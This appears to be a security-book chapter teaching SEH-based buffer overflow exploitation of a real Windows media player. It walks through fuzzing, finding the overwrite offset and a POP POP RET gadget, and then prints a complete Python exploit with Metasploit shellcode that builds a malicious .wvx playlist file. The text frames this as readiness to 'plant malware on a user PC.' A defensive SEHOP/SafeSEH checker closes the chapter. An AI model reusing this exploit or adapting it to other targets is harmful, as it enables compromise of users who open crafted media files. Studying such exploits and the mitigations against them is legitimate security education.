28. SEH Based Buffer Overflow
28.1 Introduction
28.1.1 The Basic Concept of SEH
First, let's discuss the concept of the SEH (Structured Exception Handler). SEH is an exception handling mechanism provided by the Windows operating system. It is organized as a chain, that is, a linked list of handler records.
Figure 28-1 Behavior of the SEH chain
If an exception occurs, the operating system handles it by walking the SEH chain. If a handler in the chain can handle the exception, it is executed in turn; if it cannot, that handler is skipped and the next one is tried. The SEH at the end of the chain points to "0xFFFFFFFF", which passes exception handling to the kernel. SEH solves a practical problem: not all exceptions can be handled at the developer level, and with SEH the application can therefore operate more reliably.
Windows 7 has developed a variety of techniques to block buffer overflow attacks that utilize SEH. The first is the "CPU Zeroing" technique, which initializes the values of all the registers to zero when the SEH is called. As mentioned earlier, simply executing a "JMP ESP" instruction is no longer sufficient to successfully hack the system. The second is "SEHOP" (Structured Exception Handler Overwrite Protection), which validates the chain before moving to the next SEH handler address. The last is "SafeSEH", which limits the addresses that can be used as exception handler addresses. If all three of these techniques are implemented, it becomes very difficult to hack the system with a buffer overflow attack. Briefly, let's find a way to successfully hack a system by bypassing the security technology implemented in Windows 7, in order to learn about the SEH buffer overflow technique.
28.1.2 Basic Concepts of the SEH Buffer Overflow
Figure 28-2 Behavior of the SEH Chain
When an exception occurs, the EXCEPTION_DISPOSITION Handler structure used for exception handling is placed at the top of the stack. The second item of this structure contains the address that points to the next SEH. The core of the SEH buffer overflow attack is to take advantage of the characteristics of this structure. The detailed operation is as follows.
(1) EXCEPTION_DISPOSITION Handler: Place the structure that is used for exception handling on the stack.
(2) Running SEH: The operating system runs the opcode at the address to which the SEH points. Set the input value in advance so that the SEH holds an address that points to a "POP POP RET" instruction.
(3) Running POP POP RET: Remove the top two values from the stack and execute the third value. The "44 BB 00 00" value corresponds to the next SEH address that is set at the time the exception is generated by the operating system.
(4) Running JMP: Execute the instruction that jumps forward by 6 bytes.
(5) Running Shell Code: Finally, run the shell code that you entered for hacking.
Now that you have learned the basic knowledge required for an SEH buffer overflow attack, let's write the code for the SEH buffer overflow attack in Python.
28.2 Fuzzing and Debugging
First, generate an application error through fuzzing, then write the hacking code step by step using the debugger. Try to write Python code that applies the basic concepts mentioned previously.
Figure 28-3 Hacking Procedures
The general procedure is similar to that for a stack-based buffer overflow. However, the SEH is overwritten instead of the EIP for the hacking attempt. Fuzzing allows you to find how much data is required to overwrite the SEH. The debugger can be used to find the address of a "POP POP RET" instruction, and this address must be entered at the location of the SEH. If you enter the hex code that corresponds to the "short jmp" instruction into the next SEH, the development of the "Adrenalin" file that runs shell code entered by the user is complete. Now, you are ready to plant malware on a user PC through multimedia files downloaded from the Internet.
Sample code and the test application can be downloaded from the "http://www.exploit-db.com/exploits/26525/" site. The debugger uses bufferOverflowTest.py without changes. Just enter "BlazeDVD.exe" instead of "Play.exe" as the "processName" variable. Once you have installed the downloaded application, the test preparation is complete.
junk = "\x41" * 2500              # 2500 consecutive "A" characters as the fuzzing input
x = open('Exploit.wvx', 'w')      # playlist file that the player will open
x.write(junk)
x.close()
The behavior of this example is similar to that of fuzzingBlazeDVD.py. First, create an Adrenalin file consisting of consecutive "A" characters of an arbitrary length. Run the Adrenalin player and bufferOverflowTest.py, and debugging of the player is then ready. Finally, generate an error by opening the file "Exploit.wvx" in the player, and the debugger will output the following results on the screen.
Figure 28-4 Fuzzing Test Result
The example in the previous chapter concerned the EIP register; here the contents of interest are in the SEH. Let's take a look at "SEH unwind" at the end. In the fuzzing test, you can confirm the value that was entered in the "Exploit.wvx" file. Now what you need to do is find out whether you can overwrite the SEH with an input value of a given length.
28.3 SEH Overwrite
In order to find out how many characters are needed to overwrite the SEH, let's generate a string that follows certain rules. The characters from "a" to "z" and from "0" to "9" are combined horizontally and vertically to create the string.
Create the "Exploit.wvx" file by running the program, and then open it with the Adrenalin program. It is possible to monitor the error status in the debugger. Now, let's take a look at the "SEH unwind" part, because we must overwrite the SEH. The first part is the "next SEH", and the next part corresponds to the "SEH".
Figure 28-5 Debugging Result
You can see "33313330" and "33333332" on the screen. The decode command can be used to convert these into strings, which confirms that they correspond to "3031" and "3233". "3031" corresponds to the 2,140th position in the string. Therefore, enter dummy characters up to the 2,140th position, and then put the address corresponding to the "POP POP RET" instruction.
28.4 Find the "POP POP RET" Instruction
It is not easy to find the corresponding instruction with the "pydbg" module. For convenience, download the debugger from the following site: "http://www.ollydbg.de/download.htm". Unzip the downloaded file and use the debugger without performing an installation. After running the Adrenalin player first, run OllyDbg. Let's use the "Attach" function from the OllyDbg "File" menu. Find "Play.exe" and attach to it.
Figure 28-6 Attach the Executable File
The debugger shows the state of the memory and the registers of the process on the screen. Now, let's check the information about the executable modules loaded in memory. Select "Executable modules" from the "View" menu. This shows information related to all modules used by "Play.exe".
Figure 28-7 View Modules
Previously, I explained that Windows 7 has many security features to prevent hacking. In order to view the detailed information we need to inspect, it is necessary to install an additional plug-in. In general, there are many vulnerabilities in an application's own DLLs, as opposed to the DLLs defined in the Windows directory, so the "AdrenalinX.dll" file is selected here to search for the "POP POP RET" instruction.
Double-click the DLL and then click the right mouse button to see the "Search for a sequence of commands" menu. When you type the instructions shown in the following figure, you can find the start address of the instruction sequence. When you search for an address, you must exclude addresses that include bytes such as "00", "0A" and "0D".
Figure 28-8 Find Instructions
Let's continue the search until we find a valid address for the hack. Since the addresses in the front part contain "00", let us move to the second half and start the search there. It is then possible to obtain the following results.
Figure 28-9 Finding Instruction Result
28.5 Executing the Attack
Now we can complete the hacking program. The first 2,140 bytes are filled with a particular character, the next SEH part is entered as hex code that jumps forward by only 6 bytes, and in the SEH part we enter the start address of the "POP POP RET" instruction. Finally, paste the shell code that runs the Windows Calculator program.
# Byte strings and binary mode keep the payload bytes unchanged under both
# Python 2 and Python 3.
junk = b"\x41" * 2140                 # filler up to the next SEH field (offset 2140)
junk += b"\xeb\x06\x90\x90"           # next SEH: short jmp +6, padded with two NOPs
junk += b"\xcd\xda\x13\x10"           # SEH: address of pop pop ret ***App Dll***
# Calc shellcode from msf (-b '\x00\x0a\x0d\x0b')
junk += (b"\xd9\xc8\xb8\xa0\x47\xcf\x09\xd9\x74\x24\xf4\x5f\x2b\xc9" +
b"\xb1\x32\x31\x47\x17\x83\xc7\x04\x03\xe7\x54\x2d\xfc\x1b" +
b"\xb2\x38\xff\xe3\x43\x5b\x89\x06\x72\x49\xed\x43\x27\x5d" +
b"\x65\x01\xc4\x16\x2b\xb1\x5f\x5a\xe4\xb6\xe8\xd1\xd2\xf9" +
b"\xe9\xd7\xda\x55\x29\x79\xa7\xa7\x7e\x59\x96\x68\x73\x98" +
b"\xdf\x94\x7c\xc8\x88\xd3\x2f\xfd\xbd\xa1\xf3\xfc\x11\xae" +
b"\x4c\x87\x14\x70\x38\x3d\x16\xa0\x91\x4a\x50\x58\x99\x15" +
b"\x41\x59\x4e\x46\xbd\x10\xfb\xbd\x35\xa3\x2d\x8c\xb6\x92" +
b"\x11\x43\x89\x1b\x9c\x9d\xcd\x9b\x7f\xe8\x25\xd8\x02\xeb" +
b"\xfd\xa3\xd8\x7e\xe0\x03\xaa\xd9\xc0\xb2\x7f\xbf\x83\xb8" +
b"\x34\xcb\xcc\xdc\xcb\x18\x67\xd8\x40\x9f\xa8\x69\x12\x84" +
b"\x6c\x32\xc0\xa5\x35\x9e\xa7\xda\x26\x46\x17\x7f\x2c\x64" +
b"\x4c\xf9\x6f\xe2\x93\x8b\x15\x4b\x93\x93\x15\xfb\xfc\xa2" +
b"\x9e\x94\x7b\x3b\x75\xd1\x7a\xca\x44\xcf\xeb\x75\x3d\xb2" +
b"\x71\x86\xeb\xf0\x8f\x05\x1e\x88\x6b\x15\x6b\x8d\x30\x91" +
b"\x87\xff\x29\x74\xa8\xac\x4a\x5d\xcb\x33\xd9\x3d\x0c")
x = open('Exploit.wvx', 'wb')
x.write(junk)
x.close()
Open the "Exploit.wvx" file that was generated by running fuzzingAdrenalin.py with the Adrenalin program. You can then see the following result, in which the Windows Calculator program has been launched.
Figure 28-10 SEH Based Buffer Overflow Result
Windows 7 can also effectively block the SEH-based buffer overflow attack. As described previously, you can use the "SafeSEH ON" option when compiling the program. The most important keyword for hacking is vulnerabilities: after discovering vulnerabilities by analyzing the system, the hacker can attempt to attack it. The first step in producing a safe program is to follow the security recommendations provided by the vendor.
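As an added illustration of the two mitigations named in 28.1.1 and in the paragraph above (SEHOP and SafeSEH), and not code from this book or from the Adrenalin project, the following Python models a SEHOP-style chain walk and a SafeSEH-style handler check over a constructed stack image. The stack base, the record addresses and the two "registered" handler addresses are assumptions; the overwritten record reuses the next SEH and SEH bytes from the exploit string in 28.5, which shows that the chain walk alone flags the overwrite even when the handler lives in a DLL that has no SafeSEH table.

```python
import struct

# From the SEH design described above: each EXCEPTION_REGISTRATION_RECORD is two
# 32-bit fields ("next", "handler") and the last record's "next" is 0xFFFFFFFF.
CHAIN_END = 0xFFFFFFFF
RECORD_SIZE = 8

def walk_chain(stack, base, head):
    """Follow the record list from address `head` through `stack`, the bytes of the
    stack region starting at address `base`. Returns (records, terminated): records
    as (addr, next, handler) tuples; terminated is True only if CHAIN_END was reached."""
    records, seen, addr = [], set(), head
    while addr != CHAIN_END:
        off = addr - base
        if addr in seen or off < 0 or off + RECORD_SIZE > len(stack) or off % 4:
            return records, False          # loop, or pointer outside the stack
        seen.add(addr)
        nxt, handler = struct.unpack_from("<II", stack, off)
        records.append((addr, nxt, handler))
        addr = nxt
    return records, True

def check_chain(stack, base, head, registered_handlers):
    """SEHOP-style rule: the walk must reach 0xFFFFFFFF. SafeSEH-style rule: every
    handler must be one the loaded modules registered. Returns a list of findings;
    an empty list means the chain looks intact."""
    records, terminated = walk_chain(stack, base, head)
    findings = [] if terminated else ["SEHOP: chain does not reach 0xFFFFFFFF"]
    for addr, _nxt, handler in records:
        if handler not in registered_handlers:
            findings.append("SafeSEH: unregistered handler 0x%08X at 0x%08X" % (handler, addr))
    return findings

# Constructed sample, not a real process dump: a 64-byte stack image based at
# 0x0012F000 with records at 0x0012F010 and 0x0012F030; REGISTERED is assumed.
STACK_BASE = 0x0012F000
HEAD = 0x0012F010
REGISTERED = {0x7C8E1234, 0x7C8E5678}

def build_stack(first_next, first_handler):
    img = bytearray(64)
    struct.pack_into("<II", img, 0x10, first_next, first_handler)
    struct.pack_into("<II", img, 0x30, CHAIN_END, 0x7C8E5678)   # terminating record
    return bytes(img)

INTACT = build_stack(0x0012F030, 0x7C8E1234)
# Overwritten with the exploit string's values: next SEH bytes "\xeb\x06\x90\x90"
# and SEH bytes "\xcd\xda\x13\x10" (the POP POP RET address in the application DLL).
OVERWRITTEN = build_stack(0x909006EB, 0x1013DACD)
```

Running check_chain on INTACT returns no findings, while OVERWRITTEN produces one SEHOP finding (the "next" field 0x909006EB leaves the stack) and one SafeSEH finding for handler 0x1013DACD.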